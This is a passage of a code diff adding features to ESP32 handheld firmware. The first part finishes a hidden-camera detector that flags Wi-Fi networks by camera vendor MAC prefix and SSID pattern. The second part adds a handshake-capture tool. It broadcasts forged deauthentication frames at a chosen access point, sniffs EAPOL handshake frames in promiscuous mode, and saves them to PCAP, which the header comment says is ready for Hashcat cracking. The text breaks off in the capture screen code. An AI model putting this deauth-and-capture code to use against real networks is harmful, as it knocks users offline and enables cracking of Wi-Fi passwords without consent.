+      m.channel = WiFi.channel(i);
+      m.authmode = WiFi.encryptionType(i);
+      m.isCameraOUI = isCameraOUI;
+      m.isSuspiciousSSID = ssidMatched;
+      m.isHiddenSSID = isHidden;
+      m.vendor = vendor ? vendor : "Unknown";
+      m.ssidMatch = ssidLabel ? ssidLabel : "None";
+      s_matchCount++;
+    }
+  }
+
+  WiFi.scanDelete();
+  s_scanning = false;
+}
+
+static void drawMac(char* buf, size_t bufSize, const uint8_t mac[6]) {
+  snprintf(buf, bufSize, "%02X:%02X:%02X:%02X:%02X:%02X",
+           mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
+}
+
+static const char* authModeStr(uint8_t auth) {
+  switch (auth) {
+    case WIFI_AUTH_OPEN: return "OPEN";
+    case WIFI_AUTH_WPA_PSK: return "WPA";
+    case WIFI_AUTH_WPA2_PSK: return "WPA2";
+    case WIFI_AUTH_WPA_WPA2_PSK: return "WPA/WPA2";
+    case WIFI_AUTH_WPA3_PSK: return "WPA3";
+    default: return "Unknown";
+  }
+}
+
+static const char* threatLevel(const CamMatch& m) {
+  if (m.isCameraOUI && m.isSuspiciousSSID) return "HIGH";
+  if (m.isCameraOUI) return "MEDIUM";
+  if (m.isSuspiciousSSID) return "LOW";
+  return "INFO";
+}
+
+static uint16_t threatColor(const CamMatch& m) {
+  if (m.isCameraOUI && m.isSuspiciousSSID) return TFT_RED;
+  if (m.isCameraOUI) return TFT_YELLOW;
+  if (m.isSuspiciousSSID) return TFT_CYAN;
+  return UI_TEXT;
+}
+
+static void displayResults() {
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  // Header
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(5, kHeaderY);
+  if (s_matchCount == 0) {
+    tft.setTextColor(GREEN, TFT_BLACK);
+    tft.print("CLEAR  |  ");
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print(String(s_totalScanned) + " networks");
+  } else {
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.print(String(s_matchCount) + " match");
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("  |  " + String(s_totalScanned) + " scanned");
+  }
+
+  // Matches with pagination
+  int y = kHeaderY + kLabelH + 4;
+  const int rowsPerPage = camRowsPerPage();
+  int start = s_listPage * rowsPerPage;
+  int end = min(start + rowsPerPage, s_matchCount);
+
+  for (int i = start; i < end; i++) {
+    const CamMatch& m = s_matches[i];
+    bool isSel = (i == s_selIdx);
+
+    uint16_t rowBorder = threatColor(m);
+    uint16_t rowBg = isSel ? 0x4208 : (m.isCameraOUI ? 0x4000 : 0x4008);
+
+    tft.fillRoundRect(3, y, 234, kRowH - 4, 2, rowBg);
+    tft.drawRoundRect(3, y, 234, kRowH - 4, 2, rowBorder);
+
+    tft.setTextFont(1);
+    tft.setTextSize(1);
+
+    // Threat level tag
+    tft.setTextColor(rowBorder, rowBg);
+    tft.setCursor(6, y + 2);
+    tft.print("[");
+    tft.print(threatLevel(m));
+    tft.print("]");
+
+    // Vendor or SSID match
+    if (m.isCameraOUI) {
+      tft.setTextColor(TFT_WHITE, rowBg);
+      tft.setCursor(45, y + 2);
+      tft.print(m.vendor);
+    } else {
+      tft.setTextColor(TFT_CYAN, rowBg);
+      tft.setCursor(45, y + 2);
+      tft.print(m.ssidMatch);
+    }
+
+    // SSID name
+    String ssidDisplay = String(m.ssid);
+    if (ssidDisplay.length() == 0) ssidDisplay = "[Hidden]";
+    if (ssidDisplay.length() > 24) ssidDisplay = ssidDisplay.substring(0, 24);
+    tft.setTextColor(isSel ? ORANGE : TFT_WHITE, rowBg);
+    tft.setCursor(6, y + 13);
+    tft.print(ssidDisplay);
+
+    // RSSI + channel
+    tft.setTextColor(UI_TEXT, rowBg);
+    tft.setCursor(170, y + 13);
+    tft.print(m.rssi);
+    tft.print("dB");
+
+    y += kRowH;
+  }
+
+  // Footer
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, camContentBottom() - 12);
+  if (s_matchCount > 0) {
+    tft.print("SEL=Details  UP/DOWN=Scroll  L=Rescan");
+  } else {
+    tft.print("L=Rescan  SEL=Exit");
+  }
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Rescan", "Next", "Exit", "Prev", "Details");
+  }
+}
+
+static void displayDetail() {
+  if (s_detailIdx < 0 || s_detailIdx >= s_matchCount) return;
+  const CamMatch& m = s_matches[s_detailIdx];
+
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  // Title
+  tft.setTextColor(threatColor(m), TFT_BLACK);
+  tft.setCursor(5, kHeaderY);
+  tft.print("THREAT: ");
+  tft.print(threatLevel(m));
+
+  int y = kHeaderY + 16;
+
+  // SSID
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("SSID: ");
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  if (m.isHiddenSSID) {
+    tft.print("[Hidden SSID]");
+  } else {
+    tft.print(m.ssid);
+  }
+  y += 14;
+
+  // MAC
+  char macBuf[20];
+  drawMac(macBuf, sizeof(macBuf), m.bssid);
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("MAC:  ");
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.print(macBuf);
+  y += 14;
+
+  // OUI vendor
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("OUI:  ");
+  if (m.isCameraOUI) {
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.print(m.vendor);
+    tft.print(" (CONFIRMED)");
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("No camera OUI match");
+  }
+  y += 14;
+
+  // SSID pattern match
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("SSID: ");
+  if (m.isSuspiciousSSID) {
+    tft.setTextColor(TFT_CYAN, TFT_BLACK);
+    tft.print(m.ssidMatch);
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("No pattern match");
+  }
+  y += 14;
+
+  // Channel + RSSI
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Chan: ");
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.print(m.channel);
+  tft.print("  RSSI: ");
+  tft.print(m.rssi);
+  tft.print(" dBm");
+  y += 14;
+
+  // Encryption
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Auth: ");
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.print(authModeStr(m.authmode));
+  y += 20;
+
+  // Signal quality assessment
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Signal: ");
+  if (m.rssi > -50) {
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.print("Very close");
+  } else if (m.rssi > -65) {
+    tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+    tft.print("Nearby");
+  } else if (m.rssi > -75) {
+    tft.setTextColor(TFT_CYAN, TFT_BLACK);
+    tft.print("Moderate");
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("Far");
+  }
+  y += 20;
+
+  // Assessment
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  tft.setCursor(5, y);
+  if (m.isCameraOUI && m.isSuspiciousSSID) {
+    tft.print("Camera OUI + SSID match.");
+    tft.setCursor(5, y + 12);
+    tft.print("Very likely a camera.");
+  } else if (m.isCameraOUI) {
+    tft.print("Camera vendor MAC detected.");
+    tft.setCursor(5, y + 12);
+    tft.print("Likely camera hardware.");
+  } else if (m.isSuspiciousSSID) {
+    tft.print("SSID matches camera pattern.");
+    tft.setCursor(5, y + 12);
+    tft.print("Investigate further.");
+  }
+  y += 28;
+
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("L=Back  SEL=Exit");
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Back", "", "Exit", "", "");
+  }
+}
+
+static void displayScanning() {
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  tft.setTextFont(2);
+  tft.setTextSize(1);
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(30, 80);
+  tft.print("Scanning for");
+  tft.setCursor(30, 100);
+  tft.print("hidden cameras...");
+  tft.setTextFont(1);
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(30, 130);
+  tft.print("Checking OUI + SSID patterns");
+}
+
+void camDetectorSetup() {
+  pauseBackgroundRadioTasks();
+  setTouchButtonInputEnabled(true);
+  featureClearContent(TFT_BLACK);
+
+  float battV = readBatteryVoltage();
+  drawStatusBar(battV, true);
+  redrawTouchButtonBar();
+
+#if HAS_PCF8574_BUTTONS
+  pcf.pinMode(BTN_UP, INPUT_PULLUP);
+  pcf.pinMode(BTN_DOWN, INPUT_PULLUP);
+  pcf.pinMode(BTN_RIGHT, INPUT_PULLUP);
+  pcf.pinMode(BTN_LEFT, INPUT_PULLUP);
+#endif
+
+  setupTouchscreen();
+  s_matchCount = 0;
+  s_totalScanned = 0;
+  s_selIdx = 0;
+  s_listPage = 0;
+  s_inDetailView = false;
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Rescan", "Next", "Exit", "Prev", "Details");
+  }
+
+  performScan();
+  displayResults();
+  redrawTouchButtonBar();
+}
+
+void camDetectorLoop() {
+  if (feature_active && (isButtonPressed(BTN_SELECT) || featureExitButtonPressed())) {
+    feature_exit_requested = true;
+    return;
+  }
+
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  updateStatusBar();
+
+  if (s_inDetailView) {
+    // Detail view — Left/Back to return
+    if (isButtonPressedEdge(BTN_LEFT) ||
+        (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT))) {
+      s_inDetailView = false;
+      displayResults();
+      redrawTouchButtonBar();
+    }
+    // Up/Down to cycle through matches in detail view
+    if (isButtonPressedEdge(BTN_UP) || 
+        (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_UP))) {
+      if (s_detailIdx > 0) {
+        s_detailIdx--;
+        displayDetail();
+        redrawTouchButtonBar();
+      }
+    }
+    if (isButtonPressedEdge(BTN_DOWN) ||
+        (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_DOWN))) {
+      if (s_detailIdx < s_matchCount - 1) {
+        s_detailIdx++;
+        displayDetail();
+        redrawTouchButtonBar();
+      }
+    }
+    delay(50);
+    return;
+  }
+
+  // List view
+  const int rowsPerPage = camRowsPerPage();
+
+  // Rescan on Left/Scan button only (NO auto-rescan)
+  if (isButtonPressedEdge(BTN_LEFT) ||
+      (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT))) {
+    performScan();
+    displayResults();
+    redrawTouchButtonBar();
+  }
+
+  // Navigate up
+  if (isButtonPressedEdge(BTN_UP) ||
+      (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_UP))) {
+    if (s_selIdx > 0) {
+      s_selIdx--;
+      if (s_selIdx < s_listPage * rowsPerPage) s_listPage--;
+      displayResults();
+      redrawTouchButtonBar();
+    }
+  }
+
+  // Navigate down
+  if (isButtonPressedEdge(BTN_DOWN) ||
+      (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_DOWN))) {
+    if (s_selIdx < s_matchCount - 1) {
+      s_selIdx++;
+      if (s_selIdx >= (s_listPage + 1) * rowsPerPage) s_listPage++;
+      displayResults();
+      redrawTouchButtonBar();
+    }
+  }
+
+  // Open detail view
+  if (isButtonPressedEdge(BTN_RIGHT) ||
+      (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_RIGHT))) {
+    if (s_matchCount > 0) {
+      s_detailIdx = s_selIdx;
+      s_inDetailView = true;
+      displayDetail();
+      redrawTouchButtonBar();
+    }
+  }
+
+  delay(50);
+}
+
+}  // namespace CameraDetector
+
+// ══════════════════════════════════════════════════════════════════
+// WiFi Handshake Capture
+// Select target AP → deauth clients → capture EAPOL handshake → PCAP to SD
+// Ready for offline cracking with Hashcat (-m 22000) or John the Ripper.
+// ══════════════════════════════════════════════════════════════════
+namespace HandshakeCapture {
+
+#undef TFT_BLACK
+#define TFT_BLACK FEATURE_BG
+#undef TFT_WHITE
+#define TFT_WHITE FEATURE_TEXT
+
+// --- PCAP structures (self-contained, not sharing PacketMonitor's) ---
+static constexpr uint32_t PCAP_MAGIC  = 0xa1b2c3d4;
+static constexpr uint16_t PCAP_VMAJ   = 2;
+static constexpr uint16_t PCAP_VMIN   = 4;
+static constexpr uint32_t PCAP_DLT    = 127;  // DLT_IEEE802_11_RADIO
+static constexpr uint16_t RADIOTAP_LEN = 9;   // minimal radiotap header
+
+struct __attribute__((packed)) PcapGlobalHdr {
+  uint32_t magic;
+  uint16_t vmaj, vmin;
+  int32_t  tz;
+  uint32_t sigfigs, snaplen, network;
+};
+
+struct __attribute__((packed)) PcapRecHdr {
+  uint32_t ts_sec, ts_usec, incl_len, orig_len;
+};
+
+struct __attribute__((packed)) RadiotapHdr {
+  uint8_t  version, pad;
+  uint16_t len;
+  uint32_t present;
+} __attribute__((packed));
+
+// --- State ---
+enum class HsState { Scanning, ListReady, Targeting, Capturing, Done };
+
+static HsState s_state = HsState::Scanning;
+static wifi_ap_record_t* s_apList = nullptr;
+static int s_apCount = 0;
+static int s_selIdx = 0;
+static int s_listPage = 0;
+
+static wifi_ap_record_t s_targetAp;
+static uint8_t s_targetChannel = 1;
+
+static File s_pcapFile;
+static String s_pcapPath;
+static volatile uint32_t s_eapolCount = 0;
+static volatile uint32_t s_totalPackets = 0;
+static volatile bool s_gotHandshake = false;
+
+// EAPOL frame types we track
+static volatile bool s_gotM1 = false;  // EAPOL-Key msg 1/4
+static volatile bool s_gotM2 = false;  // EAPOL-Key msg 2/4
+static volatile bool s_gotM3 = false;  // EAPOL-Key msg 3/4
+static volatile bool s_gotM4 = false;  // EAPOL-Key msg 4/4
+
+static uint32_t s_deauthCount = 0;
+static unsigned long s_lastDeauthMs = 0;
+static const uint32_t kDeauthInterval = 200;  // ms between deauth bursts
+static unsigned long s_captureStartMs = 0;
+static const uint32_t kCaptureTimeout = 60000;  // 60s max capture
+
+// Deauth frame template
+static uint8_t s_deauthFrame[26] = {
+  0xC0, 0x00, 0x00, 0x00,
+  0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  // dest (broadcast)
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // src (AP BSSID, filled at runtime)
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // BSSID (filled at runtime)
+  0x00, 0x00,  // duration
+  0x07, 0x00   // reason: Class 3 frame from non-associated STA
+};
+
+// --- Display layout ---
+static constexpr int kHeaderY = 22;
+static constexpr int kRowH = 22;
+static constexpr int kFirstRowY = kHeaderY + 14;
+
+static int hsContentBottom() {
+  return featureHasTouchNavBar() ? touchNavContentBottomY() : 320;
+}
+
+static int hsRowsPerPage() {
+  return max(1, (hsContentBottom() - kFirstRowY) / kRowH);
+}
+
+// --- EAPOL detection ---
+// 802.11 Data frame: frame_control byte0 bits [7:6] = 0b10 (Type=Data)
+// LLC/SNAP header: AA AA 03 00 00 00
+// EAPOL ethertype: 88 8E
+static bool isEAPOL(const uint8_t* payload, uint16_t len) {
+  if (!payload || len < 30) return false;
+
+  // Frame control: check if it's a Data frame (type=2)
+  uint8_t fc0 = payload[0];
+  uint8_t ftype = (fc0 >> 2) & 0x03;
+  if (ftype != 2) return false;  // Not a data frame
+
+  // Find LLC/SNAP header. In 802.11 data frames, the payload starts after
+  // the frame header (24 bytes) + possible QoS header (2 bytes) + possible HT control (4 bytes).
+  uint16_t offset = 24;
+
+  // Check for QoS data subtype
+  uint8_t subtype = (fc0 >> 4) & 0x0F;
+  if (subtype & 0x08) {
+    offset += 2;  // QoS field
+  }
+
+  if (offset + 8 > len) return false;
+
+  // LLC/SNAP: AA AA 03 00 00 00 88 8E
+  const uint8_t* llc = payload + offset;
+  if (llc[0] == 0xAA && llc[1] == 0xAA && llc[2] == 0x03 &&
+      llc[3] == 0x00 && llc[4] == 0x00 && llc[5] == 0x00 &&
+      llc[6] == 0x88 && llc[7] == 0x8E) {
+    return true;
+  }
+
+  return false;
+}
+
+// Determine which EAPOL-Key message (1-4) based on Key Info field
+static int eapolKeyMsgNum(const uint8_t* payload, uint16_t len) {
+  uint8_t fc0 = payload[0];
+  uint8_t subtype = (fc0 >> 4) & 0x0F;
+  uint16_t offset = 24;
+  if (subtype & 0x08) offset += 2;
+  if (offset + 8 > len) return 0;
+
+  // EAPOL-Key starts after LLC/SNAP (8 bytes) + EAPOL header (4 bytes) = offset+12
+  if (offset + 12 + 7 > len) return 0;
+
+  // EAPOL-Key descriptor type = offset + 12 + 1
+  const uint8_t* eapolKey = payload + offset + 8;  // after LLC/SNAP
+  // EAPOL header: version(1) type(1) length(2)
+  // EAPOL-Key: descriptor_type(1) key_info(2) ...
+  if (eapolKey[1] != 0x03) return 0;  // Not EAPOL-Key type (0x03)
+
+  const uint8_t* keyInfo = eapolKey + 4;  // descriptor_type(1) + key_info(2)
+  uint16_t info = (keyInfo[0] << 8) | keyInfo[1];
+
+  // Key Info bits: install(1) keyAck(2) keyMIC(3) secure(4) error(5) request(6) encrypted(7)
+  bool ack = info & 0x80;
+  bool mic = info & 0x100;
+  bool secure = info & 0x200;
+
+  // M1: ack=1, mic=0, secure=0
+  // M2: ack=0, mic=1, secure=0
+  // M3: ack=1, mic=1, secure=0 (usually)
+  // M4: ack=0, mic=1, secure=1 (usually)
+  if (ack && !mic) return 1;
+  if (!ack && mic && !secure) return 2;
+  if (ack && mic) return 3;
+  if (!ack && mic && secure) return 4;
+  return 0;
+}
+
+// --- PCAP writing ---
+static bool hsPcapOpen() {
+  if (!isSDCardAvailable()) return false;
+  if (!SD.exists(CAPTURE_DIR)) {
+    SD.mkdir(CAPTURE_DIR);
+  }
+
+  for (uint16_t i = 0; i < 10000; i++) {
+    char buf[64];
+    snprintf(buf, sizeof(buf), "%s/hs_%04u.pcap", CAPTURE_DIR, (unsigned)i);
+    if (!SD.exists(buf)) {
+      s_pcapPath = String(buf);
+      break;
+    }
+  }
+  if (s_pcapPath.length() == 0) return false;
+
+  s_pcapFile = SD.open(s_pcapPath.c_str(), FILE_WRITE);
+  if (!s_pcapFile) return false;
+
+  PcapGlobalHdr gh{};
+  gh.magic = PCAP_MAGIC;
+  gh.vmaj = PCAP_VMAJ;
+  gh.vmin = PCAP_VMIN;
+  gh.tz = 0;
+  gh.sigfigs = 0;
+  gh.snaplen = 65535;
+  gh.network = PCAP_DLT;
+  s_pcapFile.write((const uint8_t*)&gh, sizeof(gh));
+  return true;
+}
+
+static void hsPcapWritePacket(const uint8_t* data, uint16_t len, int8_t rssi, uint8_t channel) {
+  if (!s_pcapFile) return;
+
+  // Build minimal radiotap header
+  uint8_t rt[RADIOTAP_LEN];
+  rt[0] = 0;          // version
+  rt[1] = 0;          // pad
+  rt[2] = RADIOTAP_LEN & 0xFF;
+  rt[3] = (RADIOTAP_LEN >> 8) & 0xFF;
+  // present flags: only signal + channel
+  rt[4] = 0x00;
+  rt[5] = 0x00;
+  rt[6] = 0x00;
+  rt[7] = 0x00;
+  rt[8] = (uint8_t)rssi;
+
+  uint16_t totalLen = RADIOTAP_LEN + len;
+
+  const int64_t nowUs = esp_timer_get_time();
+  PcapRecHdr rh{};
+  rh.ts_sec = (uint32_t)(nowUs / 1000000LL);
+  rh.ts_usec = (uint32_t)(nowUs % 1000000LL);
+  rh.incl_len = totalLen;
+  rh.orig_len = totalLen;
+
+  s_pcapFile.write((const uint8_t*)&rh, sizeof(rh));
+  s_pcapFile.write(rt, RADIOTAP_LEN);
+  s_pcapFile.write(data, len);
+  s_pcapFile.flush();
+}
+
+static void hsPcapClose() {
+  if (s_pcapFile) {
+    s_pcapFile.flush();
+    s_pcapFile.close();
+  }
+}
+
+// --- Promiscuous callback ---
+static void hsPromiscuousCb(void* buf, wifi_promiscuous_pkt_type_t type) {
+  if (type == WIFI_PKT_MISC) return;
+  if (!buf) return;
+
+  wifi_promiscuous_pkt_t* pkt = (wifi_promiscuous_pkt_t*)buf;
+  wifi_pkt_rx_ctrl_t ctrl = pkt->rx_ctrl;
+  uint16_t len = (uint16_t)ctrl.sig_len;
+
+  if (len > 512) len = 512;  // cap captured size
+
+  s_totalPackets++;
+
+  // Write all data + management frames to PCAP
+  hsPcapWritePacket(pkt->payload, len, ctrl.rssi, ctrl.channel);
+
+  // Check for EAPOL
+  if (isEAPOL(pkt->payload, len)) {
+    s_eapolCount++;
+    int msgNum = eapolKeyMsgNum(pkt->payload, len);
+    if (msgNum == 1) s_gotM1 = true;
+    if (msgNum == 2) s_gotM2 = true;
+    if (msgNum == 3) s_gotM3 = true;
+    if (msgNum == 4) s_gotM4 = true;
+
+    // We need at least M1 + M2 for a crackable handshake
+    if (s_gotM1 && s_gotM2) {
+      s_gotHandshake = true;
+    }
+  }
+}
+
+// --- Deauth ---
+static void hsSendDeauth() {
+  // Fill in target BSSID
+  memcpy(&s_deauthFrame[10], s_targetAp.bssid, 6);
+  memcpy(&s_deauthFrame[16], s_targetAp.bssid, 6);
+
+  // Send on both AP and STA interfaces for maximum coverage
+  esp_wifi_set_channel(s_targetChannel, WIFI_SECOND_CHAN_NONE);
+  (void)esp_wifi_80211_tx(WIFI_IF_AP, s_deauthFrame, sizeof(s_deauthFrame), false);
+  delay(5);
+  (void)esp_wifi_80211_tx(WIFI_IF_AP, s_deauthFrame, sizeof(s_deauthFrame), false);
+  s_deauthCount++;
+}
+
+// --- WiFi init for capture mode ---
+static void hsInitCaptureWifi() {
+  wifi_mode_t wm = WIFI_MODE_NULL;
+  esp_wifi_get_mode(&wm);
+  if (wm == WIFI_MODE_NULL || wm == WIFI_MODE_STA) {
+    WiFi.mode(WIFI_AP_STA);
+    delay(50);
+  }
+
+  // Start with AP mode just so esp_wifi_80211_tx works
+  WiFi.softAP("HS_CAPTURE", nullptr, s_targetChannel, 1);
+  delay(50);
+
+  esp_wifi_set_promiscuous(false);
+  esp_wifi_set_channel(s_targetChannel, WIFI_SECOND_CHAN_NONE);
+  esp_wifi_set_promiscuous_rx_cb(hsPromiscuousCb);
+  esp_wifi_set_promiscuous(true);
+}
+
+static void hsStopCaptureWifi() {
+  esp_wifi_set_promiscuous(false);
+  esp_wifi_set_promiscuous_rx_cb(nullptr);
+  WiFi.softAPdisconnect(true);
+  WiFi.mode(WIFI_STA);
+}
+
+// --- Scan ---
+static int hsCompareAp(const void* a, const void* b) {
+  return ((wifi_ap_record_t*)b)->rssi - ((wifi_ap_record_t*)a)->rssi;
+}
+
+static void hsDoScan() {
+  s_state = HsState::Scanning;
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  tft.setTextFont(2);
+  tft.setTextSize(1);
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(30, 80);
+  tft.print("Scanning WiFi...");
+
+  int n = WifiScan::staWifiScanSync();
+  s_apCount = n;
+
+  if (s_apList) {
+    free(s_apList);
+    s_apList = nullptr;
+  }
+
+  if (n <= 0) {
+    s_apCount = 0;
+    return;
+  }
+
+  s_apList = (wifi_ap_record_t*)malloc((size_t)n * sizeof(wifi_ap_record_t));
+  if (!s_apList) {
+    s_apCount = 0;
+    return;
+  }
+
+  for (int i = 0; i < n; i++) {
+    wifi_ap_record_t ap = {};
+    memcpy(ap.bssid, WiFi.BSSID(i), 6);
+    strncpy((char*)ap.ssid, WiFi.SSID(i).c_str(), sizeof(ap.ssid));
+    ap.ssid[sizeof(ap.ssid) - 1] = '\0';
+    ap.rssi = WiFi.RSSI(i);
+    ap.primary = WiFi.channel(i);
+    ap.authmode = WiFi.encryptionType(i);
+    s_apList[i] = ap;
+  }
+  qsort(s_apList, (size_t)n, sizeof(wifi_ap_record_t), hsCompareAp);
+
+  WiFi.scanDelete();
+  s_selIdx = 0;
+  s_listPage = 0;
+  s_state = HsState::ListReady;
+}
+
+// --- Display ---
+static void hsDrawList() {
+  if (!s_apList || s_apCount <= 0) {
+    featureClearContent(TFT_BLACK);
+    tft.drawFastHLine(0, 19, 240, UI_LINE);
+    tft.setTextFont(1);
+    tft.setTextSize(1);
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.setCursor(30, 80);
+    tft.print("No networks found");
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.setCursor(30, 100);
+    tft.print("Press Left to rescan");
+    return;
+  }
+
+  // Bounds-check selIdx and listPage
+  if (s_selIdx >= s_apCount) s_selIdx = s_apCount - 1;
+  if (s_selIdx < 0) s_selIdx = 0;
+
+  const int perPage = hsRowsPerPage();
+  if (s_listPage < 0) s_listPage = 0;
+  int maxPage = (s_apCount + perPage - 1) / perPage - 1;
+  if (maxPage < 0) maxPage = 0;
+  if (s_listPage > maxPage) s_listPage = maxPage;
+  if (s_selIdx < s_listPage * perPage) s_listPage = s_selIdx / perPage;
+  if (s_selIdx >= (s_listPage + 1) * perPage) s_listPage = s_selIdx / perPage;
+
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(5, kHeaderY);
+  tft.print("Select target AP:");
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(160, kHeaderY);
+  tft.print(String(s_apCount) + " found");
+
+  int y = kFirstRowY;
+  int start = s_listPage * perPage;
+  int end = min(start + perPage, s_apCount);
+  if (start < 0) start = 0;
+  if (end > s_apCount) end = s_apCount;
+
+  for (int i = start; i < end; i++) {
+    // Safe SSID copy — wifi_ap_record_t.ssid is 33 bytes, null-terminated at [32]
+    char ssidBuf[16];
+    strncpy(ssidBuf, (const char*)s_apList[i].ssid, 15);
+    ssidBuf[15] = '\0';
+    // Check if SSID was truncated (length > 14)
+    size_t ssidLen = strnlen((const char*)s_apList[i].ssid, 32);
+    if (ssidLen > 14) {
+      ssidBuf[13] = '.';
+      ssidBuf[14] = '.';
+      ssidBuf[15] = '\0';
+    }
+
+    bool isSel = (i == s_selIdx);
+    uint16_t bg = isSel ? 0x4208 : TFT_BLACK;
+    uint16_t fg = isSel ? ORANGE : TFT_WHITE;
+
+    tft.fillRect(0, y, 240, kRowH - 2, bg);
+    tft.setTextColor(fg, bg);
+    tft.setCursor(3, y + 2);
+    tft.print(isSel ? ">" : " ");
+    tft.setCursor(10, y + 2);
+    tft.print(ssidBuf);
+    tft.setCursor(130, y + 2);
+    tft.print("CH");
+    tft.print(s_apList[i].primary);
+    tft.setCursor(160, y + 2);
+    tft.print(s_apList[i].rssi);
+    tft.print("dB");
+
+    // Show encryption type
+    const char* enc = s_apList[i].authmode == WIFI_AUTH_OPEN ? "OPEN" : "WPA";
+    tft.setCursor(200, y + 2);
+    tft.print(enc);
+
+    y += kRowH;
+  }
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Rescan", "Next", "Exit", "Prev", "Pick");
+  }
+}
+
+static void hsDrawCapturing() {
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  // Target info
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(5, kHeaderY);
+  tft.print("CAPTURING HANDSHAKE");
+
+  char buf[64];
+  snprintf(buf, sizeof(buf), "Target: %.20s", (char*)s_targetAp.ssid);
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.setCursor(5, kHeaderY + 14);
+  tft.print(buf);
+
+  snprintf(buf, sizeof(buf), "BSSID: %02X:%02X:%02X:%02X:%02X:%02X",
+           s_targetAp.bssid[0], s_targetAp.bssid[1], s_targetAp.bssid[2],
+           s_targetAp.bssid[3], s_targetAp.bssid[4], s_targetAp.bssid[5]);
+  tft.setCursor(5, kHeaderY + 26);
+  tft.print(buf);
+
+  snprintf(buf, sizeof(buf), "Channel: %d", s_targetChannel);
+  tft.setCursor(5, kHeaderY + 38);
+  tft.print(buf);
+
+  // Stats
+  int statsY = kHeaderY + 60;
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  tft.setCursor(5, statsY);
+  tft.print("EAPOL captured: ");
+  tft.setTextColor(s_eapolCount > 0 ? GREEN : TFT_RED, TFT_BLACK);
+  tft.print(s_eapolCount);
+
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  tft.setCursor(5, statsY + 12);
+  tft.print("Messages: ");
+  tft.setTextColor(s_gotM1 ? GREEN : TFT_RED, TFT_BLACK);
+  tft.print("M1");
+  tft.setTextColor(s_gotM2 ? GREEN : TFT_RED, TFT_BLACK);
+  tft.print(" M2");
+  tft.setTextColor(s_gotM3 ? GREEN : TFT_RED, TFT_BLACK);
+  tft.print(" M3");
+  tft.setTextColor(s_gotM4 ? GREEN : TFT_RED, TFT_BLACK);
+  tft.print(" M4");
+
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  tft.setCursor(5, statsY + 24);
+  tft.print("Deauths sent: ");
